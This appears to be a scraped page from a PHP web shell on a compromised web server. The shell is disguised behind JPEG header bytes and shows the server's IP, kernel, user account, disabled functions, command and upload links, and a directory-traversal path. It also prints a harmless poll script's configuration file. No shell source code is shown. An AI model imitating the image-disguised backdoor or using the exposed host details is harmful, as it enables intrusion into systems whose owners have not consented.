����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.118.9.105 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /var/softaculous/phproj/../moodle310/../invoice/../little/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php //settings for The Amazing Little Poll: // IMPORTANT: change this one into the name of your homepage file, // for example, index.php $callingfile="lp_test.php"; // File in which voting scores are kept $filename = "lplist.txt"; // Change this password so no one else can access the lp_admin.php via the web $pwd="[[admin_pass]]"; //Time between votes in seconds $time_between_votes = 36000; // Width of graph in pixels $graph_width = 100; // Height of graph in pixels $graph_height = 6; // Messages (Can easily be used as 'dynamic headers' for the poll) $message1="Your votes please"; $message2="Thanks for Voting!"; $message3="Poll Results"; // Text on vote button $vote_str="Vote"; // Use CSS code to style the 'vote' button $buttonstyle=""; ?>